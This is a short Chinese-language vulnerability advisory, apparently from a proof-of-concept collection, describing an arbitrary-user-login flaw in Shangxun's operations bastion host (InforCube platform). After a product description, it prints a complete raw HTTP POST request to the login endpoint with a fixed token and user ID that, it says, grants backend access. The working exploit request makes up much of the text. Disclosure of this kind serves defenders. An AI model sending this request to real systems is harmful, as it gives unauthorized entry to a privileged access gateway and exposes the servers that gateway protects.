上讯运维堡垒机 login 接口任意用户登录

日期: 2024-08-09 | 影响软件: 上讯运维堡垒机 | POC: 已公开

漏洞描述

上讯信息自主品牌lnforCube智能运维安全管理平台是以ITSM2.0为基准,将行业内新兴的DevSecOps、AIOps和BiModallT等技术理念与信息安全结合而形成的平台型产品, 包括用户统一身份管理(IAM)、 资产配置管理(CMDB)、 业务综合监控(IMP)、安全运维与全面审计(SOCA)、IT流程管理(ITSM)、智能数据分析(ITDA)六大核心产品模块,为客户打造—体化、可视化、 自动化、 安全化、智能化的新—代IT管理平台。该系统存在任意用户登录,攻击者可利用该漏洞获取后台权限

PoC代码

POST /impgateway/login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2702.11 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: close

token=lGLYkKyLa3nxCS9zibpO2g==&user=1

相关漏洞推荐